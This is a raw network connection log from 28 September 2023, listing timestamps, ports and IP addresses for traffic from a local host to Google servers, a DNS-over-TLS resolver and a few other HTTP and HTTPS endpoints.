Sep 28, 2023 14:32:14.135502100 CEST	443	60630	142.251.41.10	192.168.2.30
Sep 28, 2023 14:32:14.135864973 CEST	60630	443	192.168.2.30	142.251.41.10
Sep 28, 2023 14:32:14.137151957 CEST	60630	443	192.168.2.30	142.251.41.10
Sep 28, 2023 14:32:14.137181044 CEST	443	60630	142.251.41.10	192.168.2.30
Sep 28, 2023 14:32:14.139219046 CEST	443	60630	142.251.41.10	192.168.2.30
Sep 28, 2023 14:32:14.139400005 CEST	60630	443	192.168.2.30	142.251.41.10
Sep 28, 2023 14:32:14.152057886 CEST	60630	443	192.168.2.30	142.251.41.10
Sep 28, 2023 14:32:14.152406931 CEST	443	60630	142.251.41.10	192.168.2.30
Sep 28, 2023 14:32:14.154078960 CEST	60630	443	192.168.2.30	142.251.41.10
Sep 28, 2023 14:32:14.154114008 CEST	443	60630	142.251.41.10	192.168.2.30
Sep 28, 2023 14:32:14.194870949 CEST	60630	443	192.168.2.30	142.251.41.10
Sep 28, 2023 14:32:14.329725027 CEST	443	60630	142.251.41.10	192.168.2.30
Sep 28, 2023 14:32:14.329893112 CEST	443	60630	142.251.41.10	192.168.2.30
Sep 28, 2023 14:32:14.330040932 CEST	60630	443	192.168.2.30	142.251.41.10
Sep 28, 2023 14:32:14.336257935 CEST	60630	443	192.168.2.30	142.251.41.10
Sep 28, 2023 14:32:14.336304903 CEST	443	60630	142.251.41.10	192.168.2.30
Sep 28, 2023 14:32:15.037014961 CEST	56890	443	192.168.2.30	142.251.41.35
Sep 28, 2023 14:32:17.532896996 CEST	46786	443	192.168.2.30	142.250.65.234
Sep 28, 2023 14:32:17.532906055 CEST	56190	443	192.168.2.30	142.250.80.4
Sep 28, 2023 14:32:20.093015909 CEST	56888	443	192.168.2.30	142.251.41.35
Sep 28, 2023 14:32:22.653018951 CEST	56890	443	192.168.2.30	142.251.41.35
Sep 28, 2023 14:32:27.261097908 CEST	46786	443	192.168.2.30	142.250.65.234
Sep 28, 2023 14:32:27.261167049 CEST	56190	443	192.168.2.30	142.250.80.4
Sep 28, 2023 14:32:28.916898966 CEST	47592	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:32:29.008359909 CEST	853	47592	8.8.4.4	192.168.2.30
Sep 28, 2023 14:32:31.356980085 CEST	40818	443	192.168.2.30	142.250.72.110
Sep 28, 2023 14:32:31.357042074 CEST	40820	443	192.168.2.30	142.250.72.110
Sep 28, 2023 14:32:32.380891085 CEST	56888	443	192.168.2.30	142.251.41.35
Sep 28, 2023 14:32:33.932810068 CEST	47592	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:32:33.932885885 CEST	47592	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:32:34.024235010 CEST	853	47592	8.8.4.4	192.168.2.30
Sep 28, 2023 14:32:34.024709940 CEST	47592	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:32:35.452864885 CEST	49778	443	192.168.2.30	142.251.33.170
Sep 28, 2023 14:32:35.453100920 CEST	33184	443	192.168.2.30	142.251.32.74
Sep 28, 2023 14:32:37.500935078 CEST	56890	443	192.168.2.30	142.251.41.35
Sep 28, 2023 14:32:39.548930883 CEST	49776	443	192.168.2.30	142.251.33.170
Sep 28, 2023 14:32:46.205806971 CEST	46786	443	192.168.2.30	142.250.65.234
Sep 28, 2023 14:32:46.207607985 CEST	56190	443	192.168.2.30	142.250.80.4
Sep 28, 2023 14:32:56.444780111 CEST	56888	443	192.168.2.30	142.251.41.35
Sep 28, 2023 14:33:04.126972914 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:04.217784882 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:04.217858076 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:04.224838018 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:04.224904060 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:04.233581066 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:04.324534893 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:04.325525045 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:04.418525934 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:04.427453041 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:04.427510977 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:04.427695036 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:04.435682058 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:04.532402039 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:04.536695004 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:04.577944040 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:04.725743055 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:04.822493076 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:04.825733900 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:04.825799942 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:04.832254887 CEST	46744	443	192.168.2.30	142.250.65.195
Sep 28, 2023 14:33:04.832341909 CEST	443	46744	142.250.65.195	192.168.2.30
Sep 28, 2023 14:33:04.832902908 CEST	46744	443	192.168.2.30	142.250.65.195
Sep 28, 2023 14:33:04.930744886 CEST	46744	443	192.168.2.30	142.250.65.195
Sep 28, 2023 14:33:04.930815935 CEST	443	46744	142.250.65.195	192.168.2.30
Sep 28, 2023 14:33:05.131927967 CEST	443	46744	142.250.65.195	192.168.2.30
Sep 28, 2023 14:33:05.132086039 CEST	46744	443	192.168.2.30	142.250.65.195
Sep 28, 2023 14:33:05.591342926 CEST	46744	443	192.168.2.30	142.250.65.195
Sep 28, 2023 14:33:05.591430902 CEST	443	46744	142.250.65.195	192.168.2.30
Sep 28, 2023 14:33:05.592164993 CEST	443	46744	142.250.65.195	192.168.2.30
Sep 28, 2023 14:33:05.592356920 CEST	46744	443	192.168.2.30	142.250.65.195
Sep 28, 2023 14:33:05.592902899 CEST	46744	443	192.168.2.30	142.250.65.195
Sep 28, 2023 14:33:05.634468079 CEST	443	46744	142.250.65.195	192.168.2.30
Sep 28, 2023 14:33:05.709646940 CEST	443	46744	142.250.65.195	192.168.2.30
Sep 28, 2023 14:33:05.709855080 CEST	443	46744	142.250.65.195	192.168.2.30
Sep 28, 2023 14:33:05.722460985 CEST	443	46744	142.250.65.195	192.168.2.30
Sep 28, 2023 14:33:05.725399971 CEST	46744	443	192.168.2.30	142.250.65.195
Sep 28, 2023 14:33:05.807029963 CEST	46744	443	192.168.2.30	142.250.65.195
Sep 28, 2023 14:33:05.807096958 CEST	443	46744	142.250.65.195	192.168.2.30
Sep 28, 2023 14:33:07.196841955 CEST	56890	443	192.168.2.30	142.251.41.35
Sep 28, 2023 14:33:19.186956882 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:19.283876896 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:19.294336081 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:19.294384956 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:19.294416904 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:19.294461012 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:19.303397894 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:19.399998903 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:19.412128925 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:19.452685118 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:24.604808092 CEST	56190	443	192.168.2.30	142.250.80.4
Sep 28, 2023 14:33:24.605345964 CEST	46786	443	192.168.2.30	142.250.65.234
Sep 28, 2023 14:33:34.260587931 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:34.356753111 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:34.368035078 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:34.368107080 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:34.388809919 CEST	40322	80	192.168.2.30	193.168.141.67
Sep 28, 2023 14:33:34.591084957 CEST	80	40322	193.168.141.67	192.168.2.30
Sep 28, 2023 14:33:45.084647894 CEST	56888	443	192.168.2.30	142.251.41.35
Sep 28, 2023 14:33:49.307828903 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:49.403726101 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:49.409492016 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:49.409668922 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:49.410614014 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:49.410671949 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:49.410855055 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:49.506699085 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:49.510298014 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:49.540915012 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:49.632205963 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:33:49.648343086 CEST	52096	443	192.168.2.30	149.154.167.99
Sep 28, 2023 14:33:49.648427963 CEST	443	52096	149.154.167.99	192.168.2.30
Sep 28, 2023 14:33:49.648648024 CEST	52096	443	192.168.2.30	149.154.167.99
Sep 28, 2023 14:33:49.649185896 CEST	52096	443	192.168.2.30	149.154.167.99
Sep 28, 2023 14:33:49.649224043 CEST	443	52096	149.154.167.99	192.168.2.30
Sep 28, 2023 14:33:49.672630072 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:33:50.003983021 CEST	443	52096	149.154.167.99	192.168.2.30
Sep 28, 2023 14:33:50.004082918 CEST	52096	443	192.168.2.30	149.154.167.99
Sep 28, 2023 14:33:50.029993057 CEST	52096	443	192.168.2.30	149.154.167.99
Sep 28, 2023 14:33:50.030093908 CEST	443	52096	149.154.167.99	192.168.2.30
Sep 28, 2023 14:33:50.030381918 CEST	443	52096	149.154.167.99	192.168.2.30
Sep 28, 2023 14:33:50.030934095 CEST	52096	443	192.168.2.30	149.154.167.99
Sep 28, 2023 14:33:50.074453115 CEST	443	52096	149.154.167.99	192.168.2.30
Sep 28, 2023 14:33:50.373903990 CEST	443	52096	149.154.167.99	192.168.2.30
Sep 28, 2023 14:33:50.373929977 CEST	443	52096	149.154.167.99	192.168.2.30
Sep 28, 2023 14:33:50.373964071 CEST	443	52096	149.154.167.99	192.168.2.30
Sep 28, 2023 14:33:50.373992920 CEST	443	52096	149.154.167.99	192.168.2.30
Sep 28, 2023 14:33:50.374120951 CEST	52096	443	192.168.2.30	149.154.167.99
Sep 28, 2023 14:33:50.374403954 CEST	52096	443	192.168.2.30	149.154.167.99
Sep 28, 2023 14:33:50.374439001 CEST	443	52096	149.154.167.99	192.168.2.30
Sep 28, 2023 14:34:04.352684975 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:34:04.448889017 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:34:04.456016064 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:34:04.456074953 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:34:04.457571983 CEST	33844	80	192.168.2.30	135.181.49.35
Sep 28, 2023 14:34:04.652544022 CEST	80	33844	135.181.49.35	192.168.2.30
Sep 28, 2023 14:34:04.652777910 CEST	33844	80	192.168.2.30	135.181.49.35
Sep 28, 2023 14:34:04.662177086 CEST	33844	80	192.168.2.30	135.181.49.35
Sep 28, 2023 14:34:04.857075930 CEST	80	33844	135.181.49.35	192.168.2.30
Sep 28, 2023 14:34:04.857120991 CEST	80	33844	135.181.49.35	192.168.2.30
Sep 28, 2023 14:34:04.857611895 CEST	80	33844	135.181.49.35	192.168.2.30
Sep 28, 2023 14:34:04.858225107 CEST	80	33844	135.181.49.35	192.168.2.30
Sep 28, 2023 14:34:04.858269930 CEST	33844	80	192.168.2.30	135.181.49.35
Sep 28, 2023 14:34:19.368801117 CEST	33844	80	192.168.2.30	135.181.49.35
Sep 28, 2023 14:34:19.564138889 CEST	80	33844	135.181.49.35	192.168.2.30
Sep 28, 2023 14:34:19.564356089 CEST	80	33844	135.181.49.35	192.168.2.30
Sep 28, 2023 14:34:19.564970970 CEST	80	33844	135.181.49.35	192.168.2.30
Sep 28, 2023 14:34:19.565046072 CEST	33844	80	192.168.2.30	135.181.49.35
Sep 28, 2023 14:34:19.900589943 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:34:19.991282940 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:34:24.475626945 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:34:24.487303972 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:34:24.566524982 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:34:24.566770077 CEST	47596	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:34:24.577985048 CEST	853	47596	8.8.4.4	192.168.2.30
Sep 28, 2023 14:34:34.383693933 CEST	47606	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:34:34.475071907 CEST	853	47606	8.8.4.4	192.168.2.30
Sep 28, 2023 14:34:34.475398064 CEST	47606	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:34:34.482413054 CEST	853	47606	8.8.4.4	192.168.2.30
Sep 28, 2023 14:34:34.482595921 CEST	853	47606	8.8.4.4	192.168.2.30
Sep 28, 2023 14:34:34.482616901 CEST	853	47606	8.8.4.4	192.168.2.30
Sep 28, 2023 14:34:34.482636929 CEST	853	47606	8.8.4.4	192.168.2.30
Sep 28, 2023 14:34:34.482819080 CEST	47606	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:34:34.482819080 CEST	47606	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:34:34.482819080 CEST	47606	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:34:34.482819080 CEST	47606	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:34:34.493444920 CEST	47606	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:34:34.584932089 CEST	853	47606	8.8.4.4	192.168.2.30
Sep 28, 2023 14:34:34.584975958 CEST	853	47606	8.8.4.4	192.168.2.30
Sep 28, 2023 14:34:34.585079908 CEST	47606	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:34:34.625684977 CEST	47606	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:34:34.682039976 CEST	853	47606	8.8.4.4	192.168.2.30
Sep 28, 2023 14:34:34.691837072 CEST	853	47606	8.8.4.4	192.168.2.30
Sep 28, 2023 14:34:34.691961050 CEST	47606	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:34:49.418524027 CEST	47606	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:34:49.515288115 CEST	853	47606	8.8.4.4	192.168.2.30
Sep 28, 2023 14:34:49.525165081 CEST	853	47606	8.8.4.4	192.168.2.30
Sep 28, 2023 14:34:49.525356054 CEST	47606	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:34:49.567131996 CEST	80	33844	135.181.49.35	192.168.2.30
Sep 28, 2023 14:34:49.607649088 CEST	33844	80	192.168.2.30	135.181.49.35
Sep 28, 2023 14:35:04.434638977 CEST	40330	80	192.168.2.30	193.168.141.67
Sep 28, 2023 14:35:04.638961077 CEST	80	40330	193.168.141.67	192.168.2.30
Sep 28, 2023 14:35:04.956485987 CEST	47606	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:35:05.048639059 CEST	853	47606	8.8.4.4	192.168.2.30
Sep 28, 2023 14:35:09.550684929 CEST	47606	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:35:09.550765991 CEST	47606	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:35:09.642018080 CEST	853	47606	8.8.4.4	192.168.2.30
Sep 28, 2023 14:35:09.642219067 CEST	47606	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:35:12.060930967 CEST	443	47454	142.251.41.42	192.168.2.30
Sep 28, 2023 14:35:12.101501942 CEST	47454	443	192.168.2.30	142.251.41.42
Sep 28, 2023 14:35:15.732040882 CEST	443	42578	142.251.32.78	192.168.2.30
Sep 28, 2023 14:35:15.772588015 CEST	42578	443	192.168.2.30	142.251.32.78
Sep 28, 2023 14:35:16.022789955 CEST	43508	80	192.168.2.30	142.250.176.195
Sep 28, 2023 14:35:16.563792944 CEST	443	40774	142.250.80.106	192.168.2.30
Sep 28, 2023 14:35:16.604479074 CEST	40774	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:16.796646118 CEST	43508	80	192.168.2.30	142.250.176.195
Sep 28, 2023 14:35:17.086759090 CEST	51710	443	192.168.2.30	172.217.1.4
Sep 28, 2023 14:35:17.086822033 CEST	443	51710	172.217.1.4	192.168.2.30
Sep 28, 2023 14:35:17.086896896 CEST	51710	443	192.168.2.30	172.217.1.4
Sep 28, 2023 14:35:17.238274097 CEST	443	47970	142.250.64.74	192.168.2.30
Sep 28, 2023 14:35:17.260032892 CEST	47970	443	192.168.2.30	142.250.64.74
Sep 28, 2023 14:35:17.350828886 CEST	443	47970	142.250.64.74	192.168.2.30
Sep 28, 2023 14:35:17.351021051 CEST	47970	443	192.168.2.30	142.250.64.74
Sep 28, 2023 14:35:17.628607988 CEST	43508	80	192.168.2.30	142.250.176.195
Sep 28, 2023 14:35:19.228710890 CEST	43508	80	192.168.2.30	142.250.176.195
Sep 28, 2023 14:35:22.364639997 CEST	43508	80	192.168.2.30	142.250.176.195
Sep 28, 2023 14:35:22.641896963 CEST	44896	443	192.168.2.30	142.251.33.174
Sep 28, 2023 14:35:22.641897917 CEST	44896	443	192.168.2.30	142.251.33.174
Sep 28, 2023 14:35:22.641990900 CEST	443	44896	142.251.33.174	192.168.2.30
Sep 28, 2023 14:35:25.102577925 CEST	56914	443	192.168.2.30	142.251.41.35
Sep 28, 2023 14:35:25.102628946 CEST	443	56914	142.251.41.35	192.168.2.30
Sep 28, 2023 14:35:29.020466089 CEST	43508	80	192.168.2.30	142.250.176.195
Sep 28, 2023 14:35:34.617213964 CEST	33850	80	192.168.2.30	135.181.49.35
Sep 28, 2023 14:35:34.812597990 CEST	80	33850	135.181.49.35	192.168.2.30
Sep 28, 2023 14:35:34.812690973 CEST	33850	80	192.168.2.30	135.181.49.35
Sep 28, 2023 14:35:34.816485882 CEST	33850	80	192.168.2.30	135.181.49.35
Sep 28, 2023 14:35:35.011728048 CEST	80	33850	135.181.49.35	192.168.2.30
Sep 28, 2023 14:35:35.011785984 CEST	80	33850	135.181.49.35	192.168.2.30
Sep 28, 2023 14:35:35.011806965 CEST	80	33850	135.181.49.35	192.168.2.30
Sep 28, 2023 14:35:35.011826038 CEST	80	33850	135.181.49.35	192.168.2.30
Sep 28, 2023 14:35:35.012208939 CEST	80	33850	135.181.49.35	192.168.2.30
Sep 28, 2023 14:35:35.012300968 CEST	33850	80	192.168.2.30	135.181.49.35
Sep 28, 2023 14:35:39.170533895 CEST	33166	443	192.168.2.30	142.251.32.74
Sep 28, 2023 14:35:39.170629025 CEST	443	33166	142.251.32.74	192.168.2.30
Sep 28, 2023 14:35:39.170669079 CEST	33166	443	192.168.2.30	142.251.32.74
Sep 28, 2023 14:35:39.874140978 CEST	33168	443	192.168.2.30	142.251.32.74
Sep 28, 2023 14:35:39.874140978 CEST	33168	443	192.168.2.30	142.251.32.74
Sep 28, 2023 14:35:39.874232054 CEST	443	33168	142.251.32.74	192.168.2.30
Sep 28, 2023 14:35:39.959526062 CEST	47612	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:35:40.051358938 CEST	853	47612	8.8.4.4	192.168.2.30
Sep 28, 2023 14:35:40.051518917 CEST	47612	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:35:40.058290005 CEST	853	47612	8.8.4.4	192.168.2.30
Sep 28, 2023 14:35:40.058451891 CEST	47612	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:35:40.058538914 CEST	47612	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:35:40.150484085 CEST	853	47612	8.8.4.4	192.168.2.30
Sep 28, 2023 14:35:40.150618076 CEST	47612	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:35:40.241825104 CEST	853	47612	8.8.4.4	192.168.2.30
Sep 28, 2023 14:35:40.247641087 CEST	853	47612	8.8.4.4	192.168.2.30
Sep 28, 2023 14:35:40.252758980 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.252845049 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.252928019 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.288640022 CEST	47612	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:35:40.329180002 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.329250097 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.525939941 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.526089907 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.606066942 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.606148005 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.606612921 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.606692076 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.671109915 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.714526892 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.925928116 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.926148891 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.926291943 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.926372051 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.926387072 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.926387072 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.926387072 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.926481009 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.926562071 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.926562071 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.926584005 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.926645994 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.931274891 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.931355953 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.931550980 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.931727886 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.937589884 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.937828064 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.937886953 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.937954903 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.944017887 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.944092989 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.944483042 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.944680929 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.950479031 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.950608969 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:40.950666904 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:40.950853109 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.026252985 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.026473045 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.026530981 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.026604891 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.029287100 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.035324097 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.035521984 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.035582066 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.041578054 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.041884899 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.048000097 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.048233986 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.048810959 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.048904896 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.054613113 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.060499907 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.060643911 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.065984011 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.066046953 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.066409111 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.072056055 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.072371006 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.078022957 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.078280926 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.080667973 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.080740929 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.084058046 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.089863062 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.090142012 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.095937967 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.096138954 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.097290993 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.097356081 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.117158890 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.117192984 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.117338896 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.117403030 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.120193005 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.125940084 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.126018047 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.131930113 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.132213116 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.139054060 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.139406919 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.144184113 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.149897099 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.150098085 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.150201082 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.155740023 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.155977964 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.161737919 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.161808968 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:41.162699938 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:41.162764072 CEST	443	32896	142.250.65.170	192.168.2.30
